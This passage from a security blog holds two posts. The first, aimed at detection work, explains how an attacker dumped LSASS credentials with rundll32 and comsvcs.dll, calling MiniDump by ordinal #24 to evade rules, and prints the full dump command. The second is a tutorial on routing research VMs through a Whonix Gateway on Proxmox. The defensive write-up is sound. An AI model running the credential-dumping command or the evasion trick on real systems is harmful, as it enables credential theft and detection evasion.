malware analysis, you've probably seen dll functions being called by the ordinal #. </p><p>Essentially, you can call a function by ordinal instead of the function name.</p><p>These articles should explain the concept better:</p><p><a href="https://www.pcmatic.com/blog/running-dll-files-malware-analysis/">https://www.pcmatic.com/blog/running-dll-files-malware-analysis/</a> </p><p><a href="https://kamransaifullah.medium.com/practical-malware-analysis-chapter-3-basic-dynamic-analysis-42e1b7e913d4">https://kamransaifullah.medium.com/practical-malware-analysis-chapter-3-basic-dynamic-analysis-42e1b7e913d4</a></p><p>Here's an example:</p><p>instead of using LaunchApplication, I can use #1 as that's the ordinal.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhekJysQDtbFwoI-2TxHHju9LfJv7CDqZq85B0WXSJwXQPJkgeXNmqejACoiUcGFHSwVB7-Z5IATgjyat3P0dAQFJYWZtdyUxzVM9qNi2HYnac-rQBWE0E92iwrtVhkAvgK17zOszqcgJACYn8jhuPV5JB6bx08AR2ZetTWEf0kgdCI-7wbyO90a8OjNYM/s2300/Pasted_Image_10_22_23__2_06_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="952" data-original-width="2300" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhekJysQDtbFwoI-2TxHHju9LfJv7CDqZq85B0WXSJwXQPJkgeXNmqejACoiUcGFHSwVB7-Z5IATgjyat3P0dAQFJYWZtdyUxzVM9qNi2HYnac-rQBWE0E92iwrtVhkAvgK17zOszqcgJACYn8jhuPV5JB6bx08AR2ZetTWEf0kgdCI-7wbyO90a8OjNYM/w595-h245/Pasted_Image_10_22_23__2_06_PM.png" width="595" /></a></div><br /><p>The way this technique was abused during pentest was for lsass dump. The attacker used rundll32 w/ C:\windows\System32\comsvcs.dll to dump lsass.</p><p>Typical command you'll see for this is "<span style="font-family: courier;">.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full</span>"</p><p><a href="https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs.dll">https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs.dll</a></p><p>If we go look at comsvcs.dll and for MiniDump, we'll see MiniDumpW at 18 (hex -> decimal would be 24)</p><p>Instead of writing <span style="font-family: courier;">MiniDump</span> with comsvcs.dll in rundll32, the attacker replaced it with <span style="font-family: courier;">#24</span>. If you're looking specifically for comsvcs and minidump, the rule would miss this. Again, this was the first time I've seen someone do lsass dump this specific way.</p><p>There are some rules here that would and wouldn't detection this technique: <a href="https://detection.fyi/search/?query=comsvcs">https://detection.fyi/search/?query=comsvcs</a></p><p><br /></p><p><br /></p><p>Just wrote this to share and to keep this in mind when looking at alerts, hunting, or writing detections. </p><p>This assumes you only have 4688/command line logs. I'm aware that there are other ways to detect this activity but 🧂 sometimes you're lucky to even have 4688. 🧂 (yeah I work for a managed security provider)</p><div class="separator" style="clear: both; text-align: center;"><a href="https://pbs.twimg.com/media/E0jSj5iWEAgQ3UV?format=jpg&name=900x900" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="800" height="225" src="https://pbs.twimg.com/media/E0jSj5iWEAgQ3UV?format=jpg&name=900x900" width="400" /></a></div><br /><p><a href="https://twitter.com/cyb3rops/status/1389592014812024843">https://twitter.com/cyb3rops/status/1389592014812024843</a></p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvjLF46BWD_r9UUY9fYMJypxHBZ0q6cYg95fe-hlcMkIQBfcLDvqgNjsjIXa-_ezREJrJJLGAB8YEFZduFPNrs7Y62gJ2tDkgayhJwA-jX1Yn5xb7yU1bQ4hIP1OJX9Tm5OTp0cNiy2suImER-rubluw03FquapqLcqiYRrwOZwPelRmOD_BUNqkzygyw/s1523/1647249698108.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1523" data-original-width="1075" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvjLF46BWD_r9UUY9fYMJypxHBZ0q6cYg95fe-hlcMkIQBfcLDvqgNjsjIXa-_ezREJrJJLGAB8YEFZduFPNrs7Y62gJ2tDkgayhJwA-jX1Yn5xb7yU1bQ4hIP1OJX9Tm5OTp0cNiy2suImER-rubluw03FquapqLcqiYRrwOZwPelRmOD_BUNqkzygyw/w282-h400/1647249698108.jpeg" width="282" /></a></div><br /><p><a href="https://www.linkedin.com/posts/the-cyber-security-hub_activity-6909066000407633921-jVZQ">https://www.linkedin.com/posts/the-cyber-security-hub_activity-6909066000407633921-jVZQ</a></p><p><br /></p><p><br /></p>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-13334053017203456892023-10-07T10:32:00.000-07:002023-10-07T10:32:04.343-07:00Installing Whonix Gateway on Proxmox for threat & malware research<p><b>Intro</b></p><p>Whonix is a tool for routing traffic through Tor. Whonix VM's come as Desktop/with UI or CLI. They provide two types of VM's, one is gateway and one is workstation. Whonix gateway can be used to route traffic through tor when you attach other VM's to it. </p><p>In this post, I'm just setting up Whonix Gateway CLI so I can route my VMs through tor while I'm reaching malware or threats. </p><p>This set up may not always be ideal for research as some C2's, phishing kits, and OSINT research sites may block tor exit nodes.</p><p><br /></p><p><b>Warning</b>: This method isn't officially supported by Whonix and I can't guarantee this is 100% safe and won't leak anything or won't allow an attacker to escape the whonix network or fingerprint you. Do your threat modeling and risk assessment for what you're planning to research or allow to execute in VM's. <b>Follow official Whonix guidelines if you don't know what you're doing or don't feel comfortable doing this.</b></p><p><br /></p><p><b>Proxmox Network Preparation</b></p><p>We need to create a new Linux Bridge/virtual network for Whonix so VM's can communicate with Whonix Gateway.</p><p>In proxmox host network settings, add a new Linux Bridge</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhkdqLK4JAsSyKOTKRWu37k6yexDhVtGxspYMiJzH3DAvxavUcL-1NBGXRUeAher6-huiKEJcLoY24B7wbwwyHyHvZP3QqKWNAFjSVmnZ8aYQ7LE90iNucnGjWDn5mHayw9eL3ENFQfb8ga_lN7UlhxtZDAPXjkZYJCUFM9gD23Mbg1koVFaa--2SO5j-o" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="532" data-original-width="694" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEhkdqLK4JAsSyKOTKRWu37k6yexDhVtGxspYMiJzH3DAvxavUcL-1NBGXRUeAher6-huiKEJcLoY24B7wbwwyHyHvZP3QqKWNAFjSVmnZ8aYQ7LE90iNucnGjWDn5mHayw9eL3ENFQfb8ga_lN7UlhxtZDAPXjkZYJCUFM9gD23Mbg1koVFaa--2SO5j-o" width="313" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgQepbAAnhzI5lc94O3xmITinbN21fGtF-A7R7IOkLwp_8odrEKioCcbzMaPBtKzlWNYI9Ob2F2H4HfkoXCaytIzPK-m1Ncip-I4EK5aKG5K3iS7b0Se6JtL_90fvkMLWIdSzPe0BWDsvyvXNqRoBwJuEjENQvFHnhzunM8NUo8-cnftH1HtIm8WFEMJgo" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="516" data-original-width="1210" height="155" src="https://blogger.googleusercontent.com/img/a/AVvXsEgQepbAAnhzI5lc94O3xmITinbN21fGtF-A7R7IOkLwp_8odrEKioCcbzMaPBtKzlWNYI9Ob2F2H4HfkoXCaytIzPK-m1Ncip-I4EK5aKG5K3iS7b0Se6JtL_90fvkMLWIdSzPe0BWDsvyvXNqRoBwJuEjENQvFHnhzunM8NUo8-cnftH1HtIm8WFEMJgo=w364-h155" width="364" /></a></div><br />Click "Apply Configuration" at the top to finish creating the bridge.<p></p><p>fyi: you may see vmbr1 if you don't have another bridge set up already.</p><p><br /></p><p><b>Creating a VM</b></p><p>We need to create a VM to run to run Whonix Gateway in. We'll create the VM first then import the Whonix Gateway VMDK into it.</p><div class="separator" style="clear: both; text-align: left;">Pick a name</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEijwtR07xdWPghAE_3CZ-B0hrCKiR0FBmpuHLXLyV-oerwyK3ACleoe0K-HqiYPrGnIUxkvKodY3sx-ucAbMgRlwdLrdRVtvu0Py6JNn2t5tYzVCUSpBnzjv0ih1Tzf68p2mXTL8ezhQ1_lLAeywL1hQyGOrDDwB2eonjUsTn232W20g_DPxC9hHipL338" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="354" data-original-width="1444" height="78" src="https://blogger.googleusercontent.com/img/a/AVvXsEijwtR07xdWPghAE_3CZ-B0hrCKiR0FBmpuHLXLyV-oerwyK3ACleoe0K-HqiYPrGnIUxkvKodY3sx-ucAbMgRlwdLrdRVtvu0Py6JNn2t5tYzVCUSpBnzjv0ih1Tzf68p2mXTL8ezhQ1_lLAeywL1hQyGOrDDwB2eonjUsTn232W20g_DPxC9hHipL338" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Click Do not use any media</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiMw2JTmBI2qgGp9Pp8O0kHnKB_x-gfFnzrJw0jJw-DuVrp0bLMWQINOOTD6GoKp8n2vui9-lFSVViVDWLE80zKEaIz2xqvdOQWhELX1HZK95FC_bz7IIAIsiOsji_jqGxqdm4AL25HGDj8clqOGW7OKsVh5PkaC9YvNbNue9_Rk9AcLBq1EqTx9heGj3Q" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="494" data-original-width="724" height="218" src="https://blogger.googleusercontent.com/img/a/AVvXsEiMw2JTmBI2qgGp9Pp8O0kHnKB_x-gfFnzrJw0jJw-DuVrp0bLMWQINOOTD6GoKp8n2vui9-lFSVViVDWLE80zKEaIz2xqvdOQWhELX1HZK95FC_bz7IIAIsiOsji_jqGxqdm4AL25HGDj8clqOGW7OKsVh5PkaC9YvNbNue9_Rk9AcLBq1EqTx9heGj3Q" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;">Delete the disk, we'll import a disk later</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEisWZ_qz9_OE4I40CruBy3TcfnTeUQWVSfgA5icCvnIX-N_cediG9flX4ZpVcQjSvlXIAQ4IDGs0wzUzJBAwX45FqU87yelVvwDDgimmWX3C40fvq0RxPuxasYPKJNdaVR0KO81IpKaa1IY5VfxPvWjA2_wJm8mp-Kl9eQnqFcktAjozKqXFeRAGvvU1oQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="436" data-original-width="630" height="221" src="https://blogger.googleusercontent.com/img/a/AVvXsEisWZ_qz9_OE4I40CruBy3TcfnTeUQWVSfgA5icCvnIX-N_cediG9flX4ZpVcQjSvlXIAQ4IDGs0wzUzJBAwX45FqU87yelVvwDDgimmWX3C40fvq0RxPuxasYPKJNdaVR0KO81IpKaa1IY5VfxPvWjA2_wJm8mp-Kl9eQnqFcktAjozKqXFeRAGvvU1oQ" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">CPU & Memory can be left at default values, however, I'm lowering my memory to 1024.</div><div class="separator" style="clear: both; text-align: left;">Network can be left as default vmbr0. We'll add 2nd interface later.</div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">Once the VM is created, go to VM Hardware and add Network Device.</div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhvToNnE5U1xaDEqBivq2lEgJc5jpVBN2JzF-fhmrS8C34yQKjpmQFBfoAjZizsIDG_5wfVV3pdxy_05AGm3LgFTghXv-c3do9X2_C5JkGn3-TRsoRfFac6qubTaK04uzghwU-r9TdNWTJyDiZbSy0-XvPvfIXDzjpAaAxVGPbdO21frMEbs4RKOduDIHs" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="310" data-original-width="302" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEhvToNnE5U1xaDEqBivq2lEgJc5jpVBN2JzF-fhmrS8C34yQKjpmQFBfoAjZizsIDG_5wfVV3pdxy_05AGm3LgFTghXv-c3do9X2_C5JkGn3-TRsoRfFac6qubTaK04uzghwU-r9TdNWTJyDiZbSy0-XvPvfIXDzjpAaAxVGPbdO21frMEbs4RKOduDIHs" width="234" /></a></div><br />Pick and add Whonix bridge</div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiigoYeoz_WD2BtHsDxARo3WKL5WgA1bIBFjx7JmepRVQtCd3Lcrm1staaPvE74Vz5quSd9oTGuiYXBnCCj_-n8TqECHlKg_9SXV1o2CzH1SVl0-d9OZP9qTRSdGDfNaq_CO3YdcGiK73Bj_RokjvhJt5JlsVQffO9E7YUw19RcJ_oC2P_hcksipIXDadg" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="382" data-original-width="1198" height="126" src="https://blogger.googleusercontent.com/img/a/AVvXsEiigoYeoz_WD2BtHsDxARo3WKL5WgA1bIBFjx7JmepRVQtCd3Lcrm1staaPvE74Vz5quSd9oTGuiYXBnCCj_-n8TqECHlKg_9SXV1o2CzH1SVl0-d9OZP9qTRSdGDfNaq_CO3YdcGiK73Bj_RokjvhJt5JlsVQffO9E7YUw19RcJ_oC2P_hcksipIXDadg=w394-h126" width="394" /></a></div></div><div><br /></div>That's all.<div><br /><p><b>Loading the Whonix Gateway disk</b></p><p>Download Whonix CLI OVA file from here: https://www.whonix.org/wiki/VirtualBox#CLI</p><p>SCP the file to Proxmox.</p><p>Use tar to extract the OVA file, which will give you VMDK files.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhvUkrp5lhsAZqVLedx4ajFYuzRjOKm6DY9dacSBBIICOlKEYl0kbbxi7pNMnv4k0jMl_QhtdseJA2vF822xyWlIsy92pQ8O5g8rZnwc6YnZRwieEpI2bJBm_IUYKXAR9LIksYy79L6ctWzgzBrrFyfqIEfy7oyclf7wM_cV7w4r5dhkM_3Ncc8bnS67to" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="326" data-original-width="1138" height="137" src="https://blogger.googleusercontent.com/img/a/AVvXsEhvUkrp5lhsAZqVLedx4ajFYuzRjOKm6DY9dacSBBIICOlKEYl0kbbxi7pNMnv4k0jMl_QhtdseJA2vF822xyWlIsy92pQ8O5g8rZnwc6YnZRwieEpI2bJBm_IUYKXAR9LIksYy79L6ctWzgzBrrFyfqIEfy7oyclf7wM_cV7w4r5dhkM_3Ncc8bnS67to=w479-h137" width="479" /></a></div><br />Use qm import command to import the disk to your VM<p></p><p>The whonix-gateway-cli VM I created earlier has the id of 100. My storage is local-lvm (it's default proxmox storage). </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhIR7VqNbnBGaw7FuCK5SFVkJQ9wZyJGorfRNrYmylCvFI8lzfOXHcbIPfPIBh6g5CocZlkF0zWOtWS60bgJ33lq11r2AEsd52uZxLWQ_DK08ZEQ3QSxY18ivsVQvSdBBCoVeWhYqI74EuNLTVpZUfbAn2r1DBB_lrFInTQ67Mv1aHJcLizGoh36nx2bEQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="184" data-original-width="1906" height="58" src="https://blogger.googleusercontent.com/img/a/AVvXsEhIR7VqNbnBGaw7FuCK5SFVkJQ9wZyJGorfRNrYmylCvFI8lzfOXHcbIPfPIBh6g5CocZlkF0zWOtWS60bgJ33lq11r2AEsd52uZxLWQ_DK08ZEQ3QSxY18ivsVQvSdBBCoVeWhYqI74EuNLTVpZUfbAn2r1DBB_lrFInTQ67Mv1aHJcLizGoh36nx2bEQ=w599-h58" width="599" /></a></div><br />Once the Importing is done and you get the message of successful import, run qm rescan.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhv52Gfusk8m2oBmhCJIIzZ9LlQepMxU5PY8kJR51ub-s0q41HlUtONOOMYoA58DwvPv9wmZFmFwlu25KDhc40Du0Sn1K-ptcZKpQUzI_lkbwAEK3iqMKHy97sElizu_u9im3ErSsjM8YAyjPo6JcTvUUrWWEhiX4sL0UcN-ZHDLBAUkV3Cdri2PD40G4k" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="206" data-original-width="1162" height="89" src="https://blogger.googleusercontent.com/img/a/AVvXsEhv52Gfusk8m2oBmhCJIIzZ9LlQepMxU5PY8kJR51ub-s0q41HlUtONOOMYoA58DwvPv9wmZFmFwlu25KDhc40Du0Sn1K-ptcZKpQUzI_lkbwAEK3iqMKHy97sElizu_u9im3ErSsjM8YAyjPo6JcTvUUrWWEhiX4sL0UcN-ZHDLBAUkV3Cdri2PD40G4k=w430-h89" width="430" /></a></div><p></p><p>Feel free to remove the extracted files and ova file.</p><p><br /></p><p><b>Modifying the Whonix Gateway VM again</b></p><p>Now we need to enable the disk and change our boot settings.</p><p>Go to Whonix-gateway-cli VM and Hardware tab and double click on "Unused disk 0" then click Add</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhxIyhpFkb-cV8gWkvjI3y4vBkW_L0hfPFBIvadIDWiANUpSLocxNSe7kwglalnFZypuK9YTcbqZJh0x4-1Mw4j6mCSkRtr64BlYzaelA4JQlvPgYYZAiFlK1UXyDzircIfDutb9XsO-j46ecvxqYq6fvvpp9Fez1Rrh39PJyRo-1A7gKdIkdd8StpcGDI" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="566" data-original-width="1456" height="152" src="https://blogger.googleusercontent.com/img/a/AVvXsEhxIyhpFkb-cV8gWkvjI3y4vBkW_L0hfPFBIvadIDWiANUpSLocxNSe7kwglalnFZypuK9YTcbqZJh0x4-1Mw4j6mCSkRtr64BlYzaelA4JQlvPgYYZAiFlK1UXyDzircIfDutb9XsO-j46ecvxqYq6fvvpp9Fez1Rrh39PJyRo-1A7gKdIkdd8StpcGDI=w392-h152" width="392" /></a></div><br />Go to Options, double-click Boot Order and modify it to boot from scisi0/the disk we just loaded.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg0kpqiQNVCzXd6e_u7hgJKoDMEa6IgsY6sHy9VvP_Zkqv4xfPXEMUtHFS37aUpQHGubt6ifdlJhXO0gY_143ArkF0zUdKvsX-P93hx7Xq1EfY8H4oIwNh09POIqwdyk1ajqspsccWtijl_zg_vxUodf8q89ZLwzo2kN1L_fWMMMuKvbvkCEdXV9qOOr0o" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="530" data-original-width="1264" height="154" src="https://blogger.googleusercontent.com/img/a/AVvXsEg0kpqiQNVCzXd6e_u7hgJKoDMEa6IgsY6sHy9VvP_Zkqv4xfPXEMUtHFS37aUpQHGubt6ifdlJhXO0gY_143ArkF0zUdKvsX-P93hx7Xq1EfY8H4oIwNh09POIqwdyk1ajqspsccWtijl_zg_vxUodf8q89ZLwzo2kN1L_fWMMMuKvbvkCEdXV9qOOr0o=w368-h154" width="368" /></a></div><p><br /></p><b>Configuring networking inside whonix-gateway-cli VM</b><p></p><p>Make sure to remember the MAC addresses for net0 and net1 listed in hardware tab.</p><p>Essentially, we want to make sure that net1/vmbr2/whonix network has 10.152.152.10 IP.</p><p>net0/vmbr0/normal network needs to be configured w/ static IP.</p><p>Start the VM and go to the console.</p><p>Login with user/changeme then go through all the set up steps.</p><p>When the machine is trying to connect to tor, press control+c to cancel the script and get a shell.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiK0_yHFLl-Mhdsuah3j1JXzK9bij_GInWpOYnyRl5SAnmDgY5INzrG47Ffu3YPH_QZp-ysbXdf00k782Z9kIgE5uaHF-08I7od34epXactZ1UliIVQO_tuF3vk65m8VI34eNS8XmruPzQgMPX-8G_l3LN3VjEXVcSOcs4arVWAZYsVVliLfKEUgFKI4AA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="886" data-original-width="1008" height="341" src="https://blogger.googleusercontent.com/img/a/AVvXsEiK0_yHFLl-Mhdsuah3j1JXzK9bij_GInWpOYnyRl5SAnmDgY5INzrG47Ffu3YPH_QZp-ysbXdf00k782Z9kIgE5uaHF-08I7od34epXactZ1UliIVQO_tuF3vk65m8VI34eNS8XmruPzQgMPX-8G_l3LN3VjEXVcSOcs4arVWAZYsVVliLfKEUgFKI4AA=w388-h341" width="388" /></a></div><br />Edit the network configuration<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiXKo-dzHzkH1SY09A5CnNhtYTIfpRVq3CZ0ahk7FXZJZvJIsnKNDuCpZgVrJhgBhhoCC04TOFESehARahDwWSu7ZJ1CoQJ41d71fR_PC0WMSPxA-QtfQsxlV16b2Izrj8KULlPpwWwJMG5lAjrDV4qSvavB9UJYFzszAuHUdGMxA3jc4xz8viQsGdpEWY" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="176" data-original-width="1058" height="92" src="https://blogger.googleusercontent.com/img/a/AVvXsEiXKo-dzHzkH1SY09A5CnNhtYTIfpRVq3CZ0ahk7FXZJZvJIsnKNDuCpZgVrJhgBhhoCC04TOFESehARahDwWSu7ZJ1CoQJ41d71fR_PC0WMSPxA-QtfQsxlV16b2Izrj8KULlPpwWwJMG5lAjrDV4qSvavB9UJYFzszAuHUdGMxA3jc4xz8viQsGdpEWY=w557-h92" width="557" /></a></div><br />Change the default eth0 configuration to configuration that matches your network. Since Proxmox VM isn't behind NAT, it should be matching the network your proxmox machine is on.<p></p><p>This is default:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhMwrj0CXxl3oI9gtqjzG1vbDxdoTlLA2Sq2OYNZpkfCMx32pYAT-uhkiXpSne8a-Swz2FXgRD_e3UxuRnkmF5e2YZyt4x_kU_4CNHZ2O0JXGZpp-ZaxDGDpKvvwdt55mPKzYp2jgnpcE8VeOkQyG2C9-AuKsXnT1_UrW3320Kh89ZGcRx5nUyYO9knXXs" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="328" data-original-width="544" height="193" src="https://blogger.googleusercontent.com/img/a/AVvXsEhMwrj0CXxl3oI9gtqjzG1vbDxdoTlLA2Sq2OYNZpkfCMx32pYAT-uhkiXpSne8a-Swz2FXgRD_e3UxuRnkmF5e2YZyt4x_kU_4CNHZ2O0JXGZpp-ZaxDGDpKvvwdt55mPKzYp2jgnpcE8VeOkQyG2C9-AuKsXnT1_UrW3320Kh89ZGcRx5nUyYO9knXXs" width="320" /></a></div>This is what I changed the configuration to:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhgzVdgfFCk-SRrfisMWX6C5xE4sRMfRQm0I3yXbHdgxmxhu57qupv3v2lRwzVLNjwJW4-Cvd94e7huyOVGoMshiCv1o-206rueARlqLxx-SYxg4CHA3R5zP0cOEWDUZB7K931LGpEOKUOIDQGzvkvK2PPBMtuBC8yi4YfbdLEB5BqKK8cZidIxvD95i9A" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="268" data-original-width="510" height="168" src="https://blogger.googleusercontent.com/img/a/AVvXsEhgzVdgfFCk-SRrfisMWX6C5xE4sRMfRQm0I3yXbHdgxmxhu57qupv3v2lRwzVLNjwJW4-Cvd94e7huyOVGoMshiCv1o-206rueARlqLxx-SYxg4CHA3R5zP0cOEWDUZB7K931LGpEOKUOIDQGzvkvK2PPBMtuBC8yi4YfbdLEB5BqKK8cZidIxvD95i9A" width="320" /></a></div><p>Reboot the VM.</p><p>Login and run "ip a" command to ensure that Whonix network has 10.152.152.10 IP and eth0 has an actual IP for your normal network. Check the MAC address to make sure it matches the hardware you have attached.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEijDL7nvo-bItw6tPuN0ffzzd_x96gOdEz4WIjrd-G_Z5itBFZADBonhX-I0-deekJI4q9hoRwNA9AuhTKjdhDHIjeQRoh0FjId31eepIldBkPIkaFzWTHkfUFPuTN6JOskk3iFE3UxeBq_S7yIrPoTrdIk4jJlYIUTPlnkLNOwWZEtyr4ggeE-oDTA2eg" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="436" data-original-width="920" height="215" src="https://blogger.googleusercontent.com/img/a/AVvXsEijDL7nvo-bItw6tPuN0ffzzd_x96gOdEz4WIjrd-G_Z5itBFZADBonhX-I0-deekJI4q9hoRwNA9AuhTKjdhDHIjeQRoh0FjId31eepIldBkPIkaFzWTHkfUFPuTN6JOskk3iFE3UxeBq_S7yIrPoTrdIk4jJlYIUTPlnkLNOwWZEtyr4ggeE-oDTA2eg=w453-h215" width="453" /></a></div><br />Run "sudo systemcheck" to make sure you're connected to tor.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEizzW09F8AOVmasTAej_TGAxEgoXFRHHMMjOx5KLM9-3aCeNAzBIW7vI6ba1ZEixmZLLIqTe_hv4utz75_eghEFK9rlzjn_OKZF8BPUoWWGbqOBMxJui2sav7PNzplISV1-c8lz7YJBGg_rwtoviSMmHtLC9MI0O2o4czyEQLDUAyQ9_m4u96Re5IcBBGk" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="282" data-original-width="604" height="149" src="https://blogger.googleusercontent.com/img/a/AVvXsEizzW09F8AOVmasTAej_TGAxEgoXFRHHMMjOx5KLM9-3aCeNAzBIW7vI6ba1ZEixmZLLIqTe_hv4utz75_eghEFK9rlzjn_OKZF8BPUoWWGbqOBMxJui2sav7PNzplISV1-c8lz7YJBGg_rwtoviSMmHtLC9MI0O2o4czyEQLDUAyQ9_m4u96Re5IcBBGk" width="320" /></a></div><br />Check your IP and make sure it's not your IP.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjJMWJpC11W6ZJfA6-qrZ6S8ao3rTOiSn1q2KNQIA4QSN-eYLvVi-5CEX_qx8L3-LP7ztvjuRMVD2rA8Fmwlz8MNeb3ZUIboTCEHzGCH9L-5v6XBlssF8VA90Dy195nS9teQ5bgSOPbKW6MDiJZqgvCtVa8UxIrxMgp1X9aaCbus7qPbdvspZvW5szp4PY" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="216" data-original-width="600" height="115" src="https://blogger.googleusercontent.com/img/a/AVvXsEjJMWJpC11W6ZJfA6-qrZ6S8ao3rTOiSn1q2KNQIA4QSN-eYLvVi-5CEX_qx8L3-LP7ztvjuRMVD2rA8Fmwlz8MNeb3ZUIboTCEHzGCH9L-5v6XBlssF8VA90Dy195nS9teQ5bgSOPbKW6MDiJZqgvCtVa8UxIrxMgp1X9aaCbus7qPbdvspZvW5szp4PY" width="320" /></a></div><br />Reboot the VM.<br /><br /><p></p><p><b>Attaching a VM or Container</b></p><p>I'm attaching a container to the whonix network but you pretty much do the same with VM but static IP assignment needs to be done inside the VM rather than proxmox webui. Check whonix docs and links below.</p><p>I have created an Ubuntu container with the following network settings</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgD8n05ircNTAg49yj9-KFnRQRf2dLy31wTsYyVUE1nJM5YPTlWoHtpCSAW3fDb_9CqaJo2JLI7-h10Ti8P-YlThFpVGVrxqAhTxvAdZCXRrgIurp1qqQs5Jmb6ZdkJZ6xPnFZJkqKexe6tiehhWn6FSYgEHPbBZRmWRNn9bQykQ9JaEjM_cosrj_Xy66U" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="760" data-original-width="1344" height="218" src="https://blogger.googleusercontent.com/img/a/AVvXsEgD8n05ircNTAg49yj9-KFnRQRf2dLy31wTsYyVUE1nJM5YPTlWoHtpCSAW3fDb_9CqaJo2JLI7-h10Ti8P-YlThFpVGVrxqAhTxvAdZCXRrgIurp1qqQs5Jmb6ZdkJZ6xPnFZJkqKexe6tiehhWn6FSYgEHPbBZRmWRNn9bQykQ9JaEjM_cosrj_Xy66U=w385-h218" width="385" /></a></div><p>Check IP</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjYCsQfdYF2H0PpwzUxkENfA4p8pxfht5ZmJfoC7veoP3Ftgz0EVSxhMz-j7A8uqmhQxuRwT-9k6CNb_ab_1qelYISJ_GawvzABGlBSXM070fnrxPMZyWPlJcOgZDlNa37sDyqnoXFX5aDd6POn2o6JtOHw425db24o72_B83jet-3Yy2rCyueG9VYKXJ0" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="226" data-original-width="822" height="88" src="https://blogger.googleusercontent.com/img/a/AVvXsEjYCsQfdYF2H0PpwzUxkENfA4p8pxfht5ZmJfoC7veoP3Ftgz0EVSxhMz-j7A8uqmhQxuRwT-9k6CNb_ab_1qelYISJ_GawvzABGlBSXM070fnrxPMZyWPlJcOgZDlNa37sDyqnoXFX5aDd6POn2o6JtOHw425db24o72_B83jet-3Yy2rCyueG9VYKXJ0" 